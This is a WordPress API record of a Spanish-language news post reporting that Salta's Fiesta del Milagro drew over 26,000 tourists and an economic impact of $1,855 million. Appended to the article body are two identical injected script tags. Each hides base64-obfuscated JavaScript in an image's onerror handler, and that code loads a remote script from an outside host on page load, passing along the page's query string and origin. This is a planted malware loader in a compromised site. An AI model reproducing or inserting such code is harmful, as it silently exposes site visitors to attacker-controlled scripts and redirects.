{"id":3106,"date":"2023-09-18T22:27:32","date_gmt":"2023-09-19T01:27:32","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3106"},"modified":"2025-08-14T00:08:28","modified_gmt":"2025-08-14T03:08:28","slug":"durante-la-fiesta-del-milagro-salteno-el-impacto-economico-fue-de-1855-millones","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3106","title":{"rendered":"Durante la Fiesta del Milagro salte\u00f1o el impacto \u00a0econ\u00f3mico fue de $1855 millones"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#7e0e2a\"><em>M\u00e1s de 26 mil turistas se registraron en alojamientos, con un pernocte promedio de 2,2 noches.<\/em><\/h4>\n\n\n\n<p>Por las Fiestas del Milagro, turistas de todo el pa\u00eds arribaron a Salta para compartir uno de los eventos de fe m\u00e1s convocantes del pa\u00eds . El relevamiento realizado por el Ministerio de Turismo y Deportes de Salta indica que se registraron 26.627 turistas distribuidos en las siete regiones.<\/p>\n\n\n\n<p>Las localidades con principal ocupaci\u00f3n fueron San Antonio de los Cobres, Coronel Moldes, Ciudad de Salta, Cafayate, Cachi, Rosario de la Frontera, Molinos, San Lorenzo, Chicoana y San Carlos.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8922-turismo-durante-las-fiestas-del-milagro-impacto-economico-fue-de-1855-millones.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8922-turismo-durante-las-fiestas-del-milagro-impacto-economico-fue-de-1855-millones.jpg\" alt=\"Turismo durante las Fiestas del Milagro: impacto \u00a0econ\u00f3mico fue de $1855 millones\"\/><\/a><\/figure>\n\n\n\n<p>De esta manera, el impacto econ\u00f3mico directo fue de $ 1.855.069.397 para la provincia.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;destac\u00f3 lo que significa la Fiesta del Milagro salte\u00f1o y la llegada de peregrinos de toda Argentina y de pa\u00edses de la regi\u00f3n para renovar el Pacto de Fidelidad con los Santos Patronos en una de las fechas m\u00e1s importantes del turismo religioso.<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"954\" height=\"600\" data-id=\"3107\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4615-turismo-durante-el-milagro-en-salta.jpg\" alt=\"\" class=\"wp-image-3107\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4615-turismo-durante-el-milagro-en-salta.jpg 954w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4615-turismo-durante-el-milagro-en-salta-300x189.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4615-turismo-durante-el-milagro-en-salta-768x483.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4615-turismo-durante-el-milagro-en-salta-696x438.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4615-turismo-durante-el-milagro-en-salta-668x420.jpg 668w\" sizes=\"(max-width: 954px) 100vw, 954px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"891\" height=\"600\" data-id=\"3108\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4616-turismo-durante-el-milagro-en-salta.jpg\" alt=\"\" class=\"wp-image-3108\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4616-turismo-durante-el-milagro-en-salta.jpg 891w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4616-turismo-durante-el-milagro-en-salta-300x202.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4616-turismo-durante-el-milagro-en-salta-768x517.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4616-turismo-durante-el-milagro-en-salta-696x469.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4616-turismo-durante-el-milagro-en-salta-624x420.jpg 624w\" sizes=\"(max-width: 891px) 100vw, 891px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"899\" height=\"600\" data-id=\"3109\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4617-turismo-durante-el-milagro-en-salta.jpg\" alt=\"\" class=\"wp-image-3109\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4617-turismo-durante-el-milagro-en-salta.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4617-turismo-durante-el-milagro-en-salta-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4617-turismo-durante-el-milagro-en-salta-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4617-turismo-durante-el-milagro-en-salta-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/09\/4617-turismo-durante-el-milagro-en-salta-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/durante-la-fiesta-del-milagro-saltenio-el-impacto-economico-fue-de-1855-millones-91858\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>M\u00e1s de 26 mil turistas se registraron en alojamientos, con un pernocte promedio de 2,2 noches. Por las Fiestas del Milagro, turistas de todo el pa\u00eds arribaron a Salta para compartir uno de los eventos de fe m\u00e1s convocantes del pa\u00eds . El relevamiento realizado por el Ministerio de Turismo y Deportes de Salta indica [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3110,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-3106","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3106"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3106"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3106\/revisions"}],"predecessor-version":[{"id":6964,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3106\/revisions\/6964"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3110"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3106"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3106"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}